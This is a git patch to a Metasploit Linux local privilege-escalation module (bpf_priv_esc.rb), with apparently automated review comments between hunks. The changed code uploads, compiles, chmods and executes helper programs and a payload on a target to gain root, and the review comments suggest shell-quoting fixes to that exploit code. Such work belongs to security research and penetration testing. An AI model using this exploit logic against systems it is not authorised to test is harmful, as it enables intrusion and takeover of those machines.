From bac4a25b2ca6570ae8671d4c22c643fa0559cf7c Mon Sep 17 00:00:00 2001
From: h00die
Date: Thu, 29 Sep 2016 06:15:17 -0400
Subject: [PATCH] compile or nill
---
 modules/exploits/linux/local/bpf_priv_esc.rb | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb
index 5306dd3ad1..7fe2335381 100644
--- a/modules/exploits/linux/local/bpf_priv_esc.rb
+++ b/modules/exploits/linux/local/bpf_priv_esc.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("Writing #{filename} to #{file_path}.c")
 write_file("#{file_path}.c", file_content)
 register_file_for_cleanup("#{file_path}.c")
- output = cmd_exec(compile) #"gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`")
+ output = cmd_exec(compile)
 if output != ''
 print_error(output)
 fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
@@ -127,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("Writing #{filename} to #{file_path}")
 write_file(file_path, file_content)
 end
+ cmd_exec("chmod +x #{file_path}");
 register_file_for_cleanup(file_path)
 end
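Review bot: The added `cmd_exec("chmod +x #{file_path}");` in the second hunk interpolates `file_path` into a shell string unquoted and ends with a stray semicolon. A path containing a space or a shell metacharacter would be split or interpreted by the remote shell; `cmd_exec("chmod +x #{Shellwords.escape(file_path)}")` avoids that, though whether `shellwords` is already loaded in this file is not visible from the hunk. The call's output is discarded, so a failed chmod would only surface at a later step; checking it the way the compile branch checks `output` would keep the two paths consistent. The enclosing method starts above the hunk.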
@@ -464,15 +465,15 @@ class MetasploitModule < Msf::Exploit::Local
 doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/, 'exit(0);')
 print_status('Writing files to target')
+ cmd_exec("cd #{datastore['WritableDir']}")
 upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
- upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_filename} #{doubleput_filename}.c -Wall" : nil)
+ upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil)
 upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil)
 upload_and_compile('payload', payload_path, generate_payload_exe)
- cmd_exec("chmod 555 #{payload_filename}")
- cmd_exec("cd #{datastore['WritableDir']}")
+ #cmd_exec("chmod 555 #{payload_filename}")
 print_status('Starting execution of priv esc. This may take about 120 seconds')
- cmd_exec("chmod +x #{doubleput_file}; #{doubleput_file}") # we use & to not destroy our original shell
+ cmd_exec(doubleput_file)
 sec_waited = 0
 until sec_waited > datastore['MAXWAIT'] do
 Rex.sleep(1)
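Review bot: The line `#cmd_exec("chmod 555 #{payload_filename}")` is left behind as commented-out code; it should be deleted, since version control already preserves the old call. The three compile strings are also no longer built the same way: the `doubleput` one now uses `doubleput_file`, while the `hello` and `suidhelper` ones still use the `*_filename` variables. If those variables hold bare names (their definitions are outside the hunk), those two commands depend on the working directory set by the separate `cmd_exec("cd ...")` call. `datastore['WritableDir']` is interpolated into that command unquoted, so a configured path with spaces or shell metacharacters would be misparsed. The enclosing method starts before the hunk and continues past it.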